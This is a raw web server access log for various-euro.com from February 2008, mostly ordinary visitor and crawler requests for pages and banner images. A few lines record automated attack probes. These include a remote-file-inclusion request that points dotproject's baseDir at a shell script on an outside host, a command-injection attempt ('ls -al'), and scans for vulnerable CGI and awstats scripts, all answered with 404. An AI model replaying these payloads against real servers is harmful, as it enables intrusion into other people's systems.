84.29.225.57 - - [09/Feb/2008:16:57:34 +0100] "GET /bannerz/wet.gif HTTP/1.1" 200 18561 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
84.29.225.57 - - [09/Feb/2008:16:57:34 +0100] "GET /bannerz/google/Logo_40blk.gif HTTP/1.1" 200 2308 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
84.29.225.57 - - [09/Feb/2008:16:57:34 +0100] "GET /bannerz/neon_click_2.gif HTTP/1.1" 200 387 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
84.29.225.57 - - [09/Feb/2008:16:57:34 +0100] "GET /bannerz/douwil.gif HTTP/1.1" 200 528 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
84.29.225.57 - - [09/Feb/2008:16:57:34 +0100] "GET /bannerz/anti_black_small.gif HTTP/1.1" 200 1009 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
84.29.225.57 - - [09/Feb/2008:16:57:34 +0100] "GET /bannerz/copyleft_black_small.gif HTTP/1.1" 200 1231 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
65.55.209.101 - - [09/Feb/2008:18:18:00 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.101 - - [09/Feb/2008:18:18:01 +0100] "GET /world.html HTTP/1.1" 200 16295 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
66.249.67.80 - - [09/Feb/2008:19:33:19 +0100] "GET /3dsf3/sendi/receiver.html HTTP/1.1" 200 1402 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.249.60.74 - - [09/Feb/2008:19:56:32 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "VisBot/2.0 (Visvo.com Crawler; http://www.visvo.com/bot.html; bot@visvo.com)"
72.249.60.74 - - [09/Feb/2008:19:56:33 +0100] "GET / HTTP/1.0" 200 10335 "-" "VisBot/2.0 (Visvo.com Crawler; http://www.visvo.com/bot.html; bot@visvo.com)"
77.91.224.5 - - [09/Feb/2008:20:08:04 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
77.91.224.5 - - [09/Feb/2008:20:08:04 +0100] "GET / HTTP/1.1" 200 10335 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
74.6.26.168 - - [09/Feb/2008:20:16:31 +0100] "GET /schubb/schubb-4.html HTTP/1.0" 200 17746 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.246.220.18 - - [09/Feb/2008:20:39:58 +0100] "GET / HTTP/1.1" 200 10335 "http://kickme.to/ve" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:39:59 +0100] "GET / HTTP/1.1" 200 10335 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:39:59 +0100] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:39:59 +0100] "GET /framez_0.html HTTP/1.1" 200 12411 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:02 +0100] "GET /framez.html HTTP/1.1" 200 4130 "http://www.various-euro.com/framez_0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:02 +0100] "GET /frame-menu.html HTTP/1.1" 200 10763 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:02 +0100] "GET /frame-inhalt.html HTTP/1.1" 200 6025 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:02 +0100] "GET /frame-unten.html HTTP/1.1" 200 5557 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:02 +0100] "GET /bannerz/neon_click_3.gif HTTP/1.1" 200 240 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:02 +0100] "GET /bannerz/ascii-lt.gif HTTP/1.1" 200 1049 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:02 +0100] "GET /eurosign3.gif HTTP/1.1" 200 7879 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:02 +0100] "GET /bannerz/neon_click_1.gif HTTP/1.1" 200 890 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:03 +0100] "GET /bannerz/wet.gif HTTP/1.1" 200 18561 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:03 +0100] "GET /bannerz/google/Logo_40blk.gif HTTP/1.1" 200 2308 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:03 +0100] "GET /bannerz/neon_click_2.gif HTTP/1.1" 200 387 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:03 +0100] "GET /bannerz/douwil.gif HTTP/1.1" 200 528 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:03 +0100] "GET /bannerz/anti_black_small.gif HTTP/1.1" 200 1009 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:03 +0100] "GET /bannerz/copyleft_black_small.gif HTTP/1.1" 200 1231 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:03 +0100] "GET /bannerz/ubu-shot.png HTTP/1.1" 200 200117 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:04 +0100] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:03 +0100] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:17 +0100] "GET /partnergegenberlin.html HTTP/1.1" 200 5022 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:18 +0100] "GET /bannerz/kapitalismusdebatte.jpg HTTP/1.1" 200 69093 "http://www.various-euro.com/partnergegenberlin.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:18 +0100] "GET /bannerz/stasi-2-0.jpg HTTP/1.1" 200 42818 "http://www.various-euro.com/partnergegenberlin.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:18 +0100] "GET /bannerz/logo-partnergegenberlin.png HTTP/1.1" 200 6341 "http://www.various-euro.com/partnergegenberlin.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:32 +0100] "GET /f-other.html HTTP/1.1" 200 33189 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:40:33 +0100] "GET /bannerz/webmasters_click_here.gif HTTP/1.1" 200 1207 "http://www.various-euro.com/f-other.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:36 +0100] "GET /f-sponsor.html HTTP/1.1" 200 8578 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:36 +0100] "GET /16cols.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:37 +0100] "GET /bannerz/rebelle.gif HTTP/1.1" 200 6986 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:37 +0100] "GET /bannerz/docubanner2.gif HTTP/1.1" 200 14804 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:37 +0100] "GET /bannerz/beLe.gif HTTP/1.1" 200 9193 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:37 +0100] "GET /bannerz/fbwnpiscreen.jpg HTTP/1.1" 200 8204 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:37 +0100] "GET /bannerz/jimpunk.gif HTTP/1.1" 200 32077 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:37 +0100] "GET /bannerz/olmar.jpg HTTP/1.1" 200 10973 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:37 +0100] "GET /bannerz/lastone.jpg HTTP/1.1" 200 20195 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:37 +0100] "GET /bannerz/bitnee.jpg HTTP/1.1" 200 10152 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:37 +0100] "GET /bannerz/MODUKITASCII468x60.jpg HTTP/1.1" 200 4792 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:37 +0100] "GET /bannerz/d2b_on_o_o.gif HTTP/1.1" 200 6772 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:38 +0100] "GET /bannerz/GNouban.gif HTTP/1.1" 200 37201 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:38 +0100] "GET /bannerz/asco-o.gif HTTP/1.1" 200 19735 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:38 +0100] "GET /bannerz/fbwn-banner.gif HTTP/1.1" 200 5121 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:38 +0100] "GET /bannerz/restate.gif HTTP/1.1" 200 22259 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:38 +0100] "GET /bannerz/pavuJapbanner.gif HTTP/1.1" 200 14954 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:38 +0100] "GET /bannerz/fbwnpi.gif HTTP/1.1" 200 42068 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:38 +0100] "GET /bannerz/euross-big.gif HTTP/1.1" 200 19738 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
82.246.220.18 - - [09/Feb/2008:20:41:38 +0100] "GET /bannerz/pavuokwui.gif HTTP/1.1" 200 82088 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
87.123.96.240 - - [09/Feb/2008:20:42:49 +0100] "POST http://various-euro.com/dotproject/includes/db_adodb.php?baseDir=http://www.geocities.jp/mxwqkp57/lexmark/shell1.txt?cmd=pwd HTTP/1.0" 404 2748 "http://various-euro.com/dotproject/includes/db_adodb.php?baseDir=http://www.geocities.jp/mxwqkp57/lexmark/shell1.txt?cmd=pwd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
82.246.220.18 - - [09/Feb/2008:20:43:29 +0100] "GET /16cols.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
66.249.67.80 - - [09/Feb/2008:21:51:56 +0100] "GET /zampa-lovers/ HTTP/1.1" 200 37790 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.44.107 - - [09/Feb/2008:22:27:57 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.44.81 - - [09/Feb/2008:22:27:58 +0100] "GET / HTTP/1.0" 200 10335 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.26.13 - - [09/Feb/2008:22:35:05 +0100] "GET /f-rez.html HTTP/1.0" 200 9765 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.147.79.136 - - [09/Feb/2008:22:42:04 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Nokia6682/2.0 (3.01.1) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0 (compatible;YahooSeeker/M1A1-R2D2; http://help.yahoo.com/help/us/ysearch/crawling/crawling-01.html)"
80.161.45.188 - - [09/Feb/2008:22:47:10 +0100] "GET http://various-euro.com/sblogin/ HTTP/1.0" 404 2748 "http://various-euro.com/sblogin/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
74.6.19.123 - - [09/Feb/2008:23:59:55 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.216.100 - - [09/Feb/2008:23:59:55 +0100] "GET /framez-rez.html HTTP/1.0" 200 4323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.216.100 - - [09/Feb/2008:23:59:56 +0100] "GET /frame-menu.html HTTP/1.0" 200 10763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.216.100 - - [09/Feb/2008:23:59:56 +0100] "GET /f-rez.html HTTP/1.0" 200 9765 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.216.100 - - [09/Feb/2008:23:59:57 +0100] "GET /frame-unten.html HTTP/1.0" 200 5557 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.216.155.95 - - [10/Feb/2008:00:27:32 +0100] "GET /zampa/montenegro/index.html HTTP/1.1" 200 2651 "http://www.angelfire.com/psy/zampa-di-leone-zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
89.216.155.95 - - [10/Feb/2008:00:27:32 +0100] "GET /zampa/ HTTP/1.1" 200 7153 "http://www.angelfire.com/psy/zampa-di-leone-zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
89.216.155.95 - - [10/Feb/2008:00:27:35 +0100] "GET /zampa/slike/zampa.gif HTTP/1.1" 200 5310 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
89.216.155.95 - - [10/Feb/2008:00:27:35 +0100] "GET /zampa/slike/udupetu.gif HTTP/1.1" 200 4138 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
89.216.155.95 - - [10/Feb/2008:00:27:36 +0100] "GET /zampa/slike/inthearse.gif HTTP/1.1" 200 4077 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
89.216.155.95 - - [10/Feb/2008:00:27:35 +0100] "GET /zampa/montenegro/slike/plakat.jpg HTTP/1.1" 200 47879 "http://www.various-euro.com/zampa/montenegro/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
89.216.155.95 - - [10/Feb/2008:00:27:51 +0100] "GET /zampa/ HTTP/1.1" 200 7153 "http://www.angelfire.com/psy/zampa-di-leone-zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
89.216.155.95 - - [10/Feb/2008:00:27:52 +0100] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
89.216.155.95 - - [10/Feb/2008:00:27:54 +0100] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
89.216.155.95 - - [10/Feb/2008:00:28:00 +0100] "GET /zampa/montenegro/index.html HTTP/1.1" 200 2651 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
89.216.155.95 - - [10/Feb/2008:00:28:11 +0100] "GET /zampa/slike/E5UROSTO.GIF HTTP/1.1" 200 42690 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
89.216.155.95 - - [10/Feb/2008:00:28:33 +0100] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
74.6.22.40 - - [10/Feb/2008:00:47:30 +0100] "GET /neon/warning2.html HTTP/1.0" 200 997 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.214.45.123 - - [10/Feb/2008:01:18:24 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
65.214.45.123 - - [10/Feb/2008:01:18:25 +0100] "GET /neon/girlz2.html HTTP/1.0" 200 2937 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
201.143.130.229 - - [10/Feb/2008:01:24:24 +0100] "GET http://various-euro.com/cgi-bin/sblogin/report/usermanage.cgi? HTTP/1.0" 404 2748 "http://various-euro.com/cgi-bin/sblogin/report/usermanage.cgi?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
193.252.149.15 - - [10/Feb/2008:01:37:06 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.15 - - [10/Feb/2008:01:37:14 +0100] "GET /warez.html HTTP/1.1" 200 9754 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
89.12.227.119 - - [10/Feb/2008:02:08:41 +0100] "GET http://various-euro.com/ct/ctlogin.php HTTP/1.0" 404 2748 "http://various-euro.com/ct/ctlogin.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.12.227.119 - - [10/Feb/2008:02:08:42 +0100] "POST http://various-euro.com/cgi-bin/machine/mailmachine.cgi HTTP/1.0" 404 2748 "http://various-euro.com/cgi-bin/machine/mailmachine.cgi" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.12.227.119 - - [10/Feb/2008:02:08:43 +0100] "POST http://various-euro.com/cgi-bin/redir.cgi HTTP/1.0" 404 2748 "http://various-euro.com/cgi-bin/redir.cgi" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.12.227.119 - - [10/Feb/2008:02:08:43 +0100] "POST http://various-euro.com/cgi/redir.cgi HTTP/1.0" 404 2748 "http://various-euro.com/cgi/redir.cgi" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.12.227.119 - - [10/Feb/2008:02:08:43 +0100] "GET http://various-euro.com/cgi-bin/index.pl?g=ls%20-al HTTP/1.0" 404 2748 "http://various-euro.com/cgi-bin/index.pl?g=ls%20-al" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.12.227.119 - - [10/Feb/2008:02:08:43 +0100] "POST http://various-euro.com/awstats/awstats.pl HTTP/1.0" 404 2748 "http://various-euro.com/awstats/awstats.pl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.12.227.119 - - [10/Feb/2008:02:08:43 +0100] "POST http://various-euro.com/cgi-bin/awstats.pl HTTP/1.0" 404 2748 "http://various-euro.com/cgi-bin/awstats.pl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
193.252.149.15 - - [10/Feb/2008:03:39:10 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.15 - - [10/Feb/2008:03:39:13 +0100] "GET /neon/europa.html HTTP/1.1" 200 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
65.55.209.101 - - [10/Feb/2008:03:40:20 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.101 - - [10/Feb/2008:03:40:21 +0100] "GET /schubb/schubb-3.html HTTP/1.1" 200 17546 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
193.252.149.15 - - [10/Feb/2008:04:10:32 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.15 - - [10/Feb/2008:04:10:40 +0100] "GET /neon/slow-walk.html HTTP/1.1" 200 1640 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.16 - - [10/Feb/2008:04:12:39 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.16 - - [10/Feb/2008:04:12:41 +0100] "GET /neon/sushi.html HTTP/1.1" 200 687 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
74.6.26.18 - - [10/Feb/2008:04:28:27 +0100] "GET /schubb/ HTTP/1.0" 403 1223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.70.24.232 - - [10/Feb/2008:04:32:45 +0100] "GET /robots.txt HTTP/1.0" 200 64 "http://www.various-euro.com/bannerz/pavuJapbanner.gif" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:33:04 +0100] "GET /bannerz/pavuJapbanner.gif HTTP/1.0" 200 14954 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
208.70.24.232 - - [10/Feb/2008:04:33:14 +0100] "GET /bannerz/olmar.jpg HTTP/1.0" 200 10973 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (compatible; archive.org_bot/1.13.1x +http://crawler.archive.org)"
